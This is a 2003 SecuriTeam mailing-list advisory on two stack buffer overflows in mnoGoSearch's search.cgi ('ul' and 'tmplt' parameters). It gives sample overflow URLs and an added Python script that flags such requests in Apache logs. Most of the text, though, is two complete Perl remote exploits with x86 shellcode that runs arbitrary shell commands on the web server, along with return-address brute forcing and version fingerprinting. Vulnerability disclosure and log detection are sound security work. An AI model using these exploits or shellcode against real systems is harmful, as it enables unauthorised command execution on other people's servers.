[NEWS] mnoGoSearch Vulnerable to a Buffer Overflow Vulnerability (ul, tmplt)
From: SecuriTeam (support_at_securiteam.com)
Date: 06/11/03
- Previous message: SecuriTeam: "[UNIX] Java Virtual Machine Symlink Vulnerability (jpsock)"
To: list@securiteam.com Date: 11 Jun 2003 19:09:29 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
mnoGoSearch Vulnerable to a Buffer Overflow Vulnerability (ul, tmplt)
------------------------------------------------------------------------
SUMMARY
mnoGoSearch (http://www.mnogosearch.org/) is a full-featured SQL-based web
search engine. Two vulnerabilities in its search.cgi front end allow a
remote attacker to overflow two of its internal buffers, crashing the
program and possibly executing arbitrary code with the privileges of the
web server user.
DETAILS
Vulnerable systems:
* mnoGoSearch version 3.1.20
* mnoGoSearch version 3.2.10
Overflow in "ul" parameter:
The "ul" query parameter restricts search results to a given URL. Supplying
a "ul" value of more than about 5000 bytes overflows the buffer it is copied
into; the attacker can overwrite a saved return address and run commands as
the web server user.
Example:
http://blablabla.com/cgi-bin/search.cgi?ul=[6000 'A' characters]
Overflow in "tmplt" parameter:
A "tmplt" value longer than 1024 characters crashes search.cgi. This is a
stack-based buffer overflow in which the saved EIP is easily overwritten.
Example:
http://blablabla.com/cgi-bin/search.cgi?tmplt=[1050 'A' characters]
Vendor response:
The vendor was contacted on 01/06/2003 and a fix is available from the
project's CVS repository at http://www.mnogosearch.org.
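Detecting exploitation attempts in web server logs. The following is an added example for this page, not advisory or mnoGoSearch code: it parses Apache combined-format access log lines and flags requests to search.cgi whose decoded "ul" or "tmplt" parameter exceeds the lengths given above, together with the tmplt=/test/testing123 version probe that the exploits below send before the real payload. The sample log lines are constructed (documentation addresses only), and non-printable bytes are assumed to be logged the way Apache escapes them, as \xHH.

```python
"""Flag requests to mnoGoSearch's search.cgi whose "ul" or "tmplt" parameter
is long enough to trigger the overflows described in this advisory, plus the
tmplt=/test/testing123 version probe the published exploits send first.

Added example for this page, not advisory or mnoGoSearch code. The log lines
are constructed in Apache combined format (documentation addresses only), and
non-printable bytes are written the way Apache escapes them in logs: \\xHH.
"""
import re
from urllib.parse import unquote_to_bytes

# Overflow thresholds quoted in the advisory, in bytes after URL decoding.
LIMITS = {"ul": 5000, "tmplt": 1024}

# Version-check request both exploits send before the real payload.
PROBE = ("tmplt", b"/test/testing123")

# Apache combined log: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+'
)


def _params(query):
    """Split a query string into (name, value) pairs without decoding them;
    decoding happens exactly once in _decode()."""
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield name, value


def _decode(value):
    """Undo Apache's \\xHH log escaping and then percent-decoding, so the
    length matches the bytes search.cgi itself copied into its buffer."""
    raw = re.sub(r"\\x([0-9a-fA-F]{2})",
                 lambda m: chr(int(m.group(1), 16)), value)
    return unquote_to_bytes(raw.encode("latin-1"))


def analyze(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.endswith("/search.cgi"):
        return None
    for name, value in _params(query):
        data = _decode(value)
        finding = {"ip": m.group("ip"), "param": name, "length": len(data),
                   "status": m.group("status")}
        if (name, data) == PROBE:
            return dict(finding, kind="probe")
        if name in LIMITS and len(data) > LIMITS[name]:
            return dict(finding, kind="overflow", limit=LIMITS[name])
    return None


def scan(lines):
    """Findings for every line, in log order."""
    return [f for f in map(analyze, lines) if f]


# Constructed sample log. Line 1 is an ordinary search; line 2 is the
# exploits' version probe; lines 3 and 4 mirror the tmplt and ul payloads
# (1050 bytes, and 4800 filler bytes plus 200 copies of a 4-byte address).
_PREFIX = ('192.0.2.10 - - [11/Jun/2003:19:09:29 +0200] '
           '"GET /cgi-bin/search.cgi?')
SAMPLE_LOG = [
    _PREFIX + 'q=linux&ul=http://www.example.com/ HTTP/1.1" 200 4213',
    _PREFIX + 'tmplt=/test/testing123 HTTP/1.1" 200 1207',
    _PREFIX + "tmplt=" + "A" * 1050 + ' HTTP/1.1" 500 608',
    _PREFIX + "ul=" + "B" * 4800 + r"\xff\xbf\x5c\x10" * 200
            + ' HTTP/1.1" 500 608',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The length check is the robust signal: the exploits vary the filler byte and return address, but cannot shrink the parameter below the buffer size. A 500 status on a flagged line is consistent with the crash the advisory describes; the probe alone only tells you someone fingerprinted the version, which is still worth alerting on for a server that has already been patched.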
Exploits:
Exploit for ul overflow:
#!/usr/bin/perl
#
# [ reloaded ]
# mencari_sebuah_nama.pl v2.0
# mnogosearch 3.1.x (http://www.mnogosearch.org) exploit for linux ix86
# by pokleyzz of d'scan clanz (05-2003)
#
# Greet:
# tynon, sk, wanvadder, s0cket370, flyguy, sutan, spoonfork, Schm|dt,
# kerengge_kurus, b0iler and d'scan clanz.
#
# Shout to:
# #mybsd, #mylinux, #vuln
#
# Special thanks:
# Skywizard of mybsd
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Based on Poul-Henning Kamp's Beerware)
#
# How it works: search.cgi copies the "ul" query parameter into a fixed-size
# stack buffer. The request overruns it with 4800 filler bytes (plus 0-3
# "suff" bytes to fix 4-byte alignment) followed by 200 copies of a guessed
# return address. The shellcode travels in oversized Accept* headers, which
# the web server hands to the CGI as environment variables (HTTP_ACCEPT and
# friends), so it sits on the stack of search.cgi. The shellcode runs
# "/bin/sh -c" with $cmd after printing a fake Content-Type, so the command
# output comes back in the HTTP response. The main loop walks the return
# address upwards in 1024-byte steps until a response carries that marker.

use IO::Socket;

$host       = "127.0.0.1";
$cmd        = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret     = 0xbfff105c;   # first return address to try
$ret        = "";
$suffsize   = 0;            # 0..3 filler bytes to fix 4-byte alignment
$port       = 80;
my $conn;

if ($ARGV[0]) {
    $host = $ARGV[0];
} else {
    print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz of d'scan clanz\n\n";
    print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
    print "\thost\thostname to exploit\n";
    print "\tcommand\tcommand to execute on server\n";
    print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
    print "\tport\tport to connect to\n";
    print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
    print "\tret\treturn address default bfff105c\n";
    exit;
}
if ($ARGV[1]) { $cmd        = $ARGV[1]; }
if ($ARGV[2]) { $searchpath = $ARGV[2]; }
if ($ARGV[3]) { $port       = int($ARGV[3]); }
if ($ARGV[4]) { $suffsize   = int($ARGV[4]); }
if ($ARGV[5]) { $rawret     = hex_to_int($ARGV[5]); }

######### start function #########

# "bfff105c" -> 0xbfff105c
sub hex_to_int {
    my $hs = $_[0];
    return (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16)
         + (hex(substr($hs, 4, 2)) << 8)  +  hex(substr($hs, 6, 2));
}

# 0xbfff105c -> "bfff105c" (always 8 digits, which string_to_ret requires)
sub int_to_hex {
    return sprintf "%08x", $_[0];
}

# Pack the 8-digit address into 4 bytes. The order used here (ff bf 5c 10
# for bfff105c) is not plain little-endian, but because $ret is repeated
# 200 times the saved EIP reads whichever 4-byte window its alignment picks;
# "suff" shifts that alignment, and at one of the four offsets the window is
# 5c 10 ff bf, i.e. 0xbfff105c little-endian.
sub string_to_ret {
    my $rawret = $_[0];
    if (length($rawret) != 8) {
        print $rawret;
        die "[*] incorrect return address ...\n ";
    }
    $ret  = chr(hex(substr($rawret, 2, 2)));
    $ret .= chr(hex(substr($rawret, 0, 2)));
    $ret .= chr(hex(substr($rawret, 6, 2)));
    $ret .= chr(hex(substr($rawret, 4, 2)));
    return $ret;
}

sub connect_to {
    #print "[x] Connect to $host on port $port ...\n";
    $conn = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => "$host",
        PeerPort => "$port",
    ) or die "[*] Can't connect to $host on port $port ...\n";
    $conn->autoflush(1);
}

# Version fingerprint: the response to tmplt=/test/testing123 is expected to
# contain "_test_" on 3.1.x.
sub check_version {
    my $result;
    connect_to();
    print "[x] Check if $host use correct version ...\n";
    print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n";
    # capture result
    while ($line = <$conn>) {
        $result .= $line;
    }
    close $conn;
    if ($result =~ /_test_/) {
        print "[x] Correct version detected .. possibly vulnerable ...\n";
    } else {
        print $result;
        die "[x] New version or wrong url\n";
    }
}

sub exploit {
    my $rw = $_[0];
    $result = "";
    # linux ix86 shellcode rip from phx.c by proton:
    # execve("/bin/sh", ["/bin/sh", "-c", "<command>"]); the trailing "@"
    # marks the end of the command string
    $shellcode =
        "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
      . "\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
      . "\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      . "\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
      . "\x41\x41"
      . "/bin/sh -c echo 'Content-Type: text/hello';echo '';"
      . "$cmd"
      . "@";
    $strret = int_to_hex($rw);
    $ret    = string_to_ret($strret);
    # shellcode goes at the end of a 4096-byte header value
    $envvar  = 'B' x (4096 - length($shellcode));
    $envvar .= $shellcode;
    # generate query string: alignment filler, 4800 bytes of padding,
    # then the return address repeated over the saved EIP
    $buffer  = "B" x $suffsize;
    $buffer .= "B" x 4800;
    $buffer .= $ret x 200;
    $request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
             . "Accept: $envvar\n"
             . "Accept-Language: $envvar\n"
             . "Accept-Encoding: $envvar\n"
             . "User-Agent: Mozilla/4.0\n"
             . "Host: $host\n"
             . "Connection: Close\n\n";
    &connect_to;
    print "[x] Sending exploit code ..\n";
    print "[x] ret: $strret\n";
    print "[x] suf: $suffsize\n";
    print "[x] length:", length($request), "\n";
    print $conn "$request";
    while ($line = <$conn>) {
        $result .= $line;
    }
    close $conn;
}

# Success means the fake "text/hello" Content-Type came back instead of the
# normal text/html search page.
sub check_result {
    if ($result =~ /hello/ && !($result =~ /text\/html/)) {
        print $result;
        $success = 1;
    } else {
        print $result;
        print "[*] Failed ...\n";
        $success = 0;
    }
}

######### end function #########

&check_version;
# Brute-force the return address upwards through the stack region.
for ($rawret; $rawret < 0xbfffffff; $rawret += 1024) {
    &exploit($rawret);
    &check_result;
    if ($success == 1) {
        exit;
    }
    sleep 1;
}
Exploit for tmplt overflow:
#!/usr/bin/perl
#
# mnogosearch 3.2.x exploit for linux ix86
# by pokleyzz and s0cket370 of d'scan clanz
#
# Greet:
# tynon, sk, wanvadder, flyguy, sutan, spoonfork, Schm|dt, kerengge_kurus
# and d'scan clan.
#
# Special thanks:
# Skywizard of mybsd
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Based on Poul-Henning Kamp's Beerware)
#
# How it works: search.cgi copies the "tmplt" query parameter into a
# 1024-byte stack buffer. The request fills it with 0-3 "suff" alignment
# bytes followed by 258 copies of the return address, which overwrites the
# saved EIP. The shellcode travels in oversized Accept* headers that the web
# server hands to the CGI as environment variables, so it sits on the stack
# of search.cgi; it runs "/bin/sh -c" with $cmd after printing a fake
# Content-Type so the command output comes back in the HTTP response.
# Unlike the 3.1.x exploit this one tries a single return address.

use IO::Socket;

my $host       = "127.0.0.1";
my $port       = 80;
my $searchpath = "/cgi-bin/search.cgi";
my $envsize    = 4096;        # size of each shellcode-carrying header value
my $suffsize   = 3;           # 0..3 filler bytes to fix 4-byte alignment
my $rawret     = "bfffd666";  # return address, 8 hex digits
my $ret;
my $cmd        = "ls -l";
my $conn;

if ($ARGV[0]) {
    $host = $ARGV[0];
} else {
    print "[x] mnogosearch 3.2.x exploit for linux ix86 \n\tby pokleyzz and s0cket370 of d'scan clan\n\n";
    print "Usage: \n mencari_asal_usul.pl hostname [command] [path] [port] [suff] [ret]\n";
    print "\t- if not success try to use 0,1 or 2 for suff (default is 3)\n";
    exit;
}
if ($ARGV[1]) { $cmd        = $ARGV[1]; }
if ($ARGV[2]) { $searchpath = $ARGV[2]; }
if ($ARGV[3]) { $port       = int($ARGV[3]); }
if ($ARGV[4]) { $suffsize   = int($ARGV[4]); }
if ($ARGV[5]) { $rawret     = $ARGV[5]; }

# linux ix86 shellcode rip from phx.c by proton:
# execve("/bin/sh", ["/bin/sh", "-c", "<command>"]); the trailing "@" marks
# the end of the command string
my $shellcode =
    "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
  . "\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
  . "\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  . "\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  . "\x41\x41"
  . "/bin/sh -c echo 'Content-Type: text/hello';echo '';"
  . "$cmd"
  . "@";

# Pack the address little-endian: "bfffd666" -> "\x66\xd6\xff\xbf"
sub string_to_ret {
    my $rawret = $_[0];
    if (length($rawret) != 8) {
        print $rawret;
        die "[*] incorrect return address ...\n ";
    }
    $ret  = chr(hex(substr($rawret, 6, 2)));
    $ret .= chr(hex(substr($rawret, 4, 2)));
    $ret .= chr(hex(substr($rawret, 2, 2)));
    $ret .= chr(hex(substr($rawret, 0, 2)));
    return $ret;
}

sub connect_to {
    print "[x] Connect to $host on port $port ...\n";
    $conn = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => "$host",
        PeerPort => "$port",
    ) or die "[*] Can't connect to $host on port $port ...\n";
    $conn->autoflush(1);
}

# Version fingerprint: a response to tmplt=/test/testing123 that still
# contains "/test/" is taken to be the vulnerable 3.2.x.
sub check_version {
    my $result;
    connect_to();
    print "[x] Check if $host use correct version ...\n";
    print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\n\n";
    # capture result
    while ($line = <$conn>) {
        $result .= $line;
    }
    close $conn;
    if ($result =~ /\/test\//) {
        print "[x] Correct version.. possibly vulnerable ...\n";
    } else {
        print $result;
        die "[x] Old version or wrong url\n";
    }
}

# start exploiting ...
sub exploit {
    my $result = "";
    # generate environment variable for http request: shellcode sits at the
    # end of an $envsize-byte header value
    my $envvar  = 'A' x ($envsize - length($shellcode));
    $envvar .= $shellcode;
    # generate query request: alignment filler, then the return address
    # repeated across the 1024-byte buffer and over the saved EIP
    my $query  = 'A' x $suffsize;
    $query .= $ret x 258;
    # generate request
    my $request = "GET $searchpath?tmplt=$query HTTP/1.1\n"
                . "Accept: $envvar\n"
                . "Accept-Language: $envvar\n"
                . "Accept-Encoding: $envvar\n"
                . "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
                . "Host: $host\n"
                . "Connection: Close\n\n";
    print "[x] Trying to execute command ... \n";
    print "[x] Return address : $rawret \n";
    print "[x] Suffix size : $suffsize \n";
    connect_to();
    print $conn "$request";
    # capture result
    while ($line = <$conn>) {
        $result .= $line;
    }
    close $conn;
    # the fake "text/hello" Content-Type only appears if the command ran
    if ($result =~ /hello/) {
        print $result;
    } else {
        print "[*] Failed ...\n";
    }
}

&string_to_ret($rawret);
&check_version;
&exploit;
ADDITIONAL INFORMATION
The information has been provided by pokleyzz (pokleyzz@scan-associates.net).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.